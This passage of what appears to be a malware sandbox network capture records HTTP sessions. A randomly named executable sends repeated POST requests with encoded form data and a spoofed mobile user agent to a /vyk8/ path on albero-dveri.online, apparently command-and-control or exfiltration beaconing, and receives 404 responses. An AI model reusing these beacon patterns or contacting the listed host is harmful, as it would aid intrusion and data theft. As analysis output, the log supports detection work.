                                                      Sep 19, 2024 15:05:27.528037071 CEST896INData Raw: 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b 28
                                                      Data Ascii: .cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{
                                                      Sep 19, 2024 15:05:27.528045893 CEST1236INData Raw: 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e 62 6f 64 79 29 7b 75 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28
                                                      Data Ascii: ){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head
                                                      Sep 19, 2024 15:05:27.528063059 CEST1236INData Raw: 67 74 68 29 7b 72 65 74 75 72 6e 20 5f 5f 63 6d 70 2e 61 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 70 69 6e 67 22 29 7b 69 66 28 61 5b 31 5d 3d 3d 3d 32 29 7b 61 5b 32 5d 28 7b 67 64 70 72 41 70 70 6c 69 65 73 3a 67 64 70 72 41 70 70 6c
                                                      Data Ascii: gth){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{a[2](false,true)}}else{if(a[0]==="getUSPData"){a[2]({ve
                                                      Sep 19, 2024 15:05:27.528074026 CEST1236INData Raw: 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 5f 5f 67 70 70 2e 65 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 69 66 28 5f 5f 67 70 70 2e 65 5b 64 5d 2e 69 64 3d 3d 65 29 7b 5f 5f 67 70 70 2e 65 5b 64 5d 2e 73 70 6c 69 63 65 28 64 2c 31 29 3b 68 3d 74 72 75
                                                      Data Ascii: or(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_ping()}}else{if(g==="getGPPData"){return{sectionId:3,gppVersion:1,section
                                                      Sep 19, 2024 15:05:27.528084040 CEST1236INData Raw: 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d 2c 62 2e 70 61 72 61 6d 65 74 65 72 29 7d 69 66 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c 6c
                                                      Data Ascii: Message(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?J
                                                      Sep 19, 2024 15:05:27.528093100 CEST1236INData Raw: 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 67 70 70 4c 6f 63 61 74 6f 72 22 29 7d 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 63 6d 70 22 29 3b 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 22 20 69 6e 20 77
                                                      Data Ascii: mp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_setStub("__tcfapi")}if(!("cmp_disableusp" in window)||!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp
                                                      Sep 19, 2024 15:05:27.533077955 CEST418INData Raw: 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69
                                                      Data Ascii: meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><link rel="icon" type="image/jpg" href="http://i4.cdn-image.com/__media__/pics/468/netso


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.2249183194.58.112.174802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:06.691634893 CEST2472OUTPOST /vyk8/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.albero-dveri.online
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 2161
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.albero-dveri.online
                                                      Referer: http://www.albero-dveri.online/vyk8/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 79 2b 2b 64 6d 79 79 55 76 6d 36 34 2b 47 37 44 77 33 6e 30 55 2b 77 55 4d 42 68 62 30 69 53 75 65 70 58 68 4a 51 73 48 46 50 6e 4e 38 37 6c 6a 2b 50 33 72 75 42 35 31 62 53 48 52 41 4d 4f 4b 30 69 63 45 64 64 78 43 71 48 6b 57 4c 7a 52 78 53 30 69 59 41 34 63 33 76 43 6c 77 48 4a 33 65 6b 63 74 61 65 5a 73 7a 47 38 2f 32 6d 38 55 42 41 57 66 76 33 76 4b 76 2b 7a 45 58 51 2f 69 43 4e 34 7a 42 61 76 71 66 66 77 6d 41 49 31 65 45 4c 72 78 70 73 53 77 39 6e 50 66 63 35 6c 4f 53 42 55 31 51 46 58 6a 43 7a 44 4a 51 76 51 67 47 75 75 37 6e 63 46 48 6c 66 31 4e 46 4e 73 4a 32 6b 47 58 52 6d 7a 71 65 7a 50 57 43 6c 63 75 53 71 47 52 5a 48 7a 4a 46 52 30 4f 48 42 73 36 72 4c 39 79 43 61 79 39 48 38 7a 43 6a 75 34 59 56 68 37 35 35 70 49 4e 33 78 70 64 57 5a 65 70 6e 63 66 46 6a 4a 72 59 31 61 49 68 45 39 72 37 34 39 33 4e 71 6d 62 2b 35 66 55 63 39 51 66 38 33 75 42 44 74 78 39 44 45 44 78 74 41 66 57 77 55 78 64 4f 56 33 68 64 61 63 6e 35 54 59 6c 75 76 56 56 4f 48 2b 61 4c 62 7a 77 70 66 34 [TRUNCATED]
                                                      Data Ascii: 00yp=y++dmyyUvm64+G7Dw3n0U+wUMBhb0iSuepXhJQsHFPnN87lj+P3ruB51bSHRAMOK0icEddxCqHkWLzRxS0iYA4c3vClwHJ3ekctaeZszG8/2m8UBAWfv3vKv+zEXQ/iCN4zBavqffwmAI1eELrxpsSw9nPfc5lOSBU1QFXjCzDJQvQgGuu7ncFHlf1NFNsJ2kGXRmzqezPWClcuSqGRZHzJFR0OHBs6rL9yCay9H8zCju4YVh755pIN3xpdWZepncfFjJrY1aIhE9r7493Nqmb+5fUc9Qf83uBDtx9DEDxtAfWwUxdOV3hdacn5TYluvVVOH+aLbzwpf4EwTLAIORowEFSbuhV/UnpwbsItf1+dfV9GJVOnjketip4oWo+wbIQrL1I5dFy4R7Lrowf9OrpVCvCHpZanS+ZNcoE5Ati300GUnU1pmqwSsxpzbvSysIJLSU2JfjuomCN5lHbxbEdCxB+fnOFPt6PZnruHcCGipPVouhrbWPvDvRjlyP3Cd2VA4ZAil0HEPfbpLGr1Yp9Th26OE236/KDMJ27I72pdhuvZrknWfrk1O44x2nftpf+dMG2nO0vAaxEu7w90Y3kXVBir/Hbl7E8jURFa28Ym7T34gwL7rG1wi+sjDz26hBwu7S7qne96+Nwes9SKypz5Kg62szcg5jDF5MZf4b7/HFpW8owo4iPbNsjlzfl7v1Ky5Yt8SO3kSqPsr9Amqi6SUNcz6feKBaXfQeyBeOWwAh1Qx1yAquCVDN9PrsfBfehaGn+2edA+r7n/Lt08y2wQInRZZvV2cIpaBzq+h4GWJixM9d+UdsMqdWFaapd8r7hqd3wKvgT1gOxA3S8bEoetVs/ZfLaGgOmRvTuXLQCUUZ8Q1idWfCDCJ7gFqGIGam2l9DiZWSCMZIUJ6e9MQkUeDzxRpjm0PV2294Rl71H544E4RNlj7Kwn5tFedz16/GW8sFfyFAiyhhkncEc4jO73kbf7Mvv2aLD3ThCzcluyIwef [TRUNCATED]
                                                      Sep 19, 2024 15:06:06.696619034 CEST249OUTData Raw: 31 75 51 54 77 42 4f 71 77 4f 4d 64 36 43 65 6b 43 39 6a 51 73 63 4e 32 56 32 6d 6f 49 4b 41 72 31 49 61 7a 75 77 6c 48 6f 58 5a 4d 75 52 46 79 6e 37 59 59 76 69 78 77 64 35 78 43 70 7a 4e 61 47 50 33 67 5a 71 72 36 69 75 50 43 6a 44 36 4d 63 4e
                                                      Data Ascii: 1uQTwBOqwOMd6CekC9jQscN2V2moIKAr1IazuwlHoXZMuRFyn7YYvixwd5xCpzNaGP3gZqr6iuPCjD6McN0jzvkNNIfMEQNGUuCfTrY9v3gw+fu4qc8bzKstE53sanbh27+oh8p1aSYrolN12S9BCdNi0VxgwRzNYJxvMnt9whnAxKqVBZlHDzhHJUcHaGeM6kRt1KmgOejqg726uqWVuLIA54HIBYwuIumF4pJ3tcdCafm8Lrb
                                                      Sep 19, 2024 15:06:07.378061056 CEST1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Thu, 19 Sep 2024 13:06:07 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                      Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                      Sep 19, 2024 15:06:07.378113031 CEST1236INData Raw: 74 e0 41 a3 ef 69 fb 74 d6 89 f9 0b 4c eb 1a 03 78 b5 e3 b5 5c b5 11 19 da c3 31 61 14 f8 5e f7 e9 46 01 2d 03 ee 36 45 b5 7f 01 bd 08 61 50 ef e3 f8 1e 70 c6 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f
                                                      Data Ascii: tAitLx\1a^F-6EaPp#Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hn
                                                      Sep 19, 2024 15:06:07.378151894 CEST1236INData Raw: ba bc 8b a7 b2 4a 64 c1 ff 24 fa 64 d6 03 79 e9 b0 2c f2 f4 34 c5 18 27 e3 8b 11 99 6d d0 39 ad 05 fd 51 94 a7 bc a0 98 d8 22 91 e6 2c 81 33 e5 c2 b9 05 9a 23 4d 06 ab 3f 02 93 7e ca d1 1f 1b 5e 46 3b e4 39 2a e2 6f b8 1b 50 ad 53 0f 90 78 0d 9b
                                                      Data Ascii: Jd$dy,4'm9Q",3#M?~^F;9*oPSx|MU8 ~z(/#}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9o
                                                      Sep 19, 2024 15:06:07.378184080 CEST116INData Raw: c6 97 e8 bd dc ab b0 90 ad 0a b5 38 72 d8 74 42 3f e0 22 1e f7 7a d1 c8 9e 9f 45 31 ce a6 9d 41 57 bf 6d 9b bb 92 2d 0a 61 56 26 2f 5e c1 d1 21 37 9e 05 fa 70 2c 3c f4 39 2b db a1 ef 8e 22 b5 22 e8 aa e4 ac 71 06 3f c3 2b 2b 25 21 5d 3c 94 22 47
                                                      Data Ascii: 8rtB?"zE1AWm-aV&/^!7p,<9+""q?++%!]<"G)dRu,GO/x)0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.2249184194.58.112.174802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:09.350878000 CEST760OUTPOST /vyk8/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.albero-dveri.online
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 201
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.albero-dveri.online
                                                      Referer: http://www.albero-dveri.online/vyk8/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 79 2b 2b 64 6d 79 79 55 76 6d 36 34 2b 46 44 44 33 32 6e 30 58 65 77 55 4c 42 68 62 2f 43 53 6f 65 75 66 70 4a 53 41 58 47 38 58 4e 38 72 56 6a 2b 38 50 72 70 42 35 36 51 79 48 56 4b 73 4f 62 30 69 64 74 64 59 4a 43 71 48 67 57 4b 57 4e 78 61 56 69 66 44 49 63 78 6d 69 6c 7a 48 4a 37 39 6b 63 70 4b 65 59 30 7a 47 2b 72 32 6c 38 45 42 47 30 33 76 6d 50 4b 32 34 7a 45 4d 51 2f 66 59 4e 34 6a 7a 61 75 57 66 66 43 53 41 49 67 71 45 42 63 46 70 33 69 77 2b 2f 2f 65 66 31 32 72 4d 59 69 35 6a 46 55 62 63 79 78 39 44 69 77 6f 46 75 50 62 78 63 48 2f 50 58 44 34 69 4f 59 4e 6d 2f 41 3d 3d
                                                      Data Ascii: 00yp=y++dmyyUvm64+FDD32n0XewULBhb/CSoeufpJSAXG8XN8rVj+8PrpB56QyHVKsOb0idtdYJCqHgWKWNxaVifDIcxmilzHJ79kcpKeY0zG+r2l8EBG03vmPK24zEMQ/fYN4jzauWffCSAIgqEBcFp3iw+//ef12rMYi5jFUbcyx9DiwoFuPbxcH/PXD4iOYNm/A==
                                                      Sep 19, 2024 15:06:10.060755014 CEST1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Thu, 19 Sep 2024 13:06:09 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                                                      Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                      Sep 19, 2024 15:06:10.060798883 CEST1236INData Raw: 74 e0 41 a3 ef 69 fb 74 d6 89 f9 0b 4c eb 1a 03 78 b5 e3 b5 5c b5 11 19 da c3 31 61 14 f8 5e f7 e9 46 01 2d 03 ee 36 45 b5 7f 01 bd 08 61 50 ef e3 f8 1e 70 c6 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f
                                                      Data Ascii: tAitLx\1a^F-6EaPp#Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hn
                                                      Sep 19, 2024 15:06:10.060853004 CEST1236INData Raw: ba bc 8b a7 b2 4a 64 c1 ff 24 fa 64 d6 03 79 e9 b0 2c f2 f4 34 c5 18 27 e3 8b 11 99 6d d0 39 ad 05 fd 51 94 a7 bc a0 98 d8 22 91 e6 2c 81 33 e5 c2 b9 05 9a 23 4d 06 ab 3f 02 93 7e ca d1 1f 1b 5e 46 3b e4 39 2a e2 6f b8 1b 50 ad 53 0f 90 78 0d 9b
                                                      Data Ascii: Jd$dy,4'm9Q",3#M?~^F;9*oPSx|MU8 ~z(/#}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9o
                                                      Sep 19, 2024 15:06:10.060883045 CEST116INData Raw: c6 97 e8 bd dc ab b0 90 ad 0a b5 38 72 d8 74 42 3f e0 22 1e f7 7a d1 c8 9e 9f 45 31 ce a6 9d 41 57 bf 6d 9b bb 92 2d 0a 61 56 26 2f 5e c1 d1 21 37 9e 05 fa 70 2c 3c f4 39 2b db a1 ef 8e 22 b5 22 e8 aa e4 ac 71 06 3f c3 2b 2b 25 21 5d 3c 94 22 47
                                                      Data Ascii: 8rtB?"zE1AWm-aV&/^!7p,<9+""q?++%!]<"G)dRu,GO/x)0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.2249185194.58.112.174802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:11.900881052 CEST2472OUTPOST /vyk8/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.albero-dveri.online
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 3625
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.albero-dveri.online
                                                      Referer: http://www.albero-dveri.online/vyk8/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 79 2b 2b 64 6d 79 79 55 76 6d 36 34 38 6b 54 44 6b 6c 2f 30 44 4f 77 56 4f 42 68 62 30 69 53 73 65 70 58 70 4a 51 73 48 46 4f 62 4e 38 34 64 6a 2b 66 33 72 76 42 35 36 59 53 48 52 41 4d 4f 4e 30 69 59 55 64 64 73 35 71 45 4d 57 4c 32 39 78 53 33 4b 59 57 6f 63 33 69 69 6c 79 48 4a 36 2f 6b 63 5a 47 65 59 41 64 47 2b 7a 32 6d 4b 51 42 41 45 33 75 73 76 4b 32 34 7a 45 51 51 2f 66 34 4e 34 72 72 61 71 79 70 66 77 61 41 49 46 65 45 41 37 78 6d 78 69 77 79 6a 50 66 6f 35 6c 79 42 42 55 31 55 46 58 33 6b 7a 44 46 51 76 43 6f 47 75 6f 7a 6b 54 31 48 6d 53 56 4e 46 44 4d 4a 6a 6b 47 58 56 6d 7a 71 65 7a 50 61 43 6b 4d 75 53 71 48 52 65 59 6a 4a 46 4f 45 4f 4b 4d 4d 6d 42 4c 39 6d 64 61 79 67 79 39 45 53 6a 74 37 77 56 77 37 35 35 68 59 4e 39 78 70 64 68 51 2b 70 52 63 66 38 63 4a 72 6f 6c 61 49 68 45 39 6f 7a 34 73 30 31 71 76 72 2b 35 53 30 63 2b 61 2f 38 30 75 42 50 44 78 38 48 45 44 31 42 41 5a 6b 59 55 35 2b 32 61 34 78 64 66 59 6e 35 52 63 6c 76 6c 56 56 53 74 2b 61 44 39 7a 7a 78 66 34 [TRUNCATED]
                                                      Data Ascii: 00yp=y++dmyyUvm648kTDkl/0DOwVOBhb0iSsepXpJQsHFObN84dj+f3rvB56YSHRAMON0iYUdds5qEMWL29xS3KYWoc3iilyHJ6/kcZGeYAdG+z2mKQBAE3usvK24zEQQ/f4N4rraqypfwaAIFeEA7xmxiwyjPfo5lyBBU1UFX3kzDFQvCoGuozkT1HmSVNFDMJjkGXVmzqezPaCkMuSqHReYjJFOEOKMMmBL9mdaygy9ESjt7wVw755hYN9xpdhQ+pRcf8cJrolaIhE9oz4s01qvr+5S0c+a/80uBPDx8HED1BAZkYU5+2a4xdfYn5RclvlVVSt+aD9zzxf4GITNiwOQYwHfCbUzlDAnoJ4sIpP18ZfUtqJFc/g4etkqIoYs+xkIRfl1JZdEHER6LLo1sVNuZVJliH6X6mT+ZZEoFpQtzn0mmUnZ3BlmASplZyQlyzpIJL8U0xljbcmCNJlJppbEdCyXOfhY1zP6PVjruybCHSpPF4uhqbWCvDvLzl1ZHC92VUoZBbQ03gPRYhLEpNYh9TjlKOUpn6IKDcJ26Ar2qdhr+Zrj1yfy01Kmox1nftPf+QNG2300qYaxBW7hvcY5EXUHir7VrlYE8rEREmM8aG7QXYg15frAlwg8sjDom7kB0KBS+a3e8C+NC2s2SKzkT5Fi62z58grjDV5MZT4b6HHF4W8sDA4tfbLojkmUFnP1KibYvQkOx0Sl6Qr+GapmKSeKczwbeLkaXfce3h3Ol0Ak0wxmjA1iCVICdP4ofBvehqgn8rTdzar7mPLtBQy2AQInRZWvV2YIpWVzrOP4GWJtFg9cNwd0cqYblbe/d8P7h/23wT0gTZgcwg3S8bHnOtW3PZcLaaHOmRNTubLQ0MUYvo1i76fLDCJ6gE8RYGZm2ltDnoLSH4ZJg16d44XoEeGxxQqqG4QV3L64Vp71WJ46WQRMVj7Rwn4mleIulGjGWhDFb+VHTihnV3cJ7M8M735ff7OvvrqLD+QhCbqlomIx+f [TRUNCATED]
                                                      Sep 19, 2024 15:06:11.905996084 CEST1713OUTData Raw: 31 6e 41 54 32 42 4f 72 78 54 39 68 44 43 65 6b 4f 39 6a 55 73 63 4e 6d 56 32 6b 77 49 4b 77 72 71 58 61 7a 74 35 46 47 69 64 35 4d 49 52 46 79 64 37 5a 59 46 69 79 63 64 35 6a 4b 70 6a 63 61 47 50 48 67 58 6a 4c 36 78 71 50 4f 78 44 39 45 59 4e
                                                      Data Ascii: 1nAT2BOrxT9hDCekO9jUscNmV2kwIKwrqXazt5FGid5MIRFyd7ZYFiycd5jKpjcaGPHgXjL6xqPOxD9EYNxeGuXJNKpQEV4aU5yfS1I9i3g8WfuoMc+zVKZVE7Hsaw5J5tOon5p1TSYrElN96S4RSdJO0VyIwQDNbZRvOkt9qhiZnKqN/Zl3Dzg7JV4jaQuM6mRt0Jmgtajmj7y7Fwy5oG+Ip4kITZWi0qGAKiLvmc+HEKmFwxK
                                                      Sep 19, 2024 15:06:12.589276075 CEST1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Thu, 19 Sep 2024 13:06:12 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
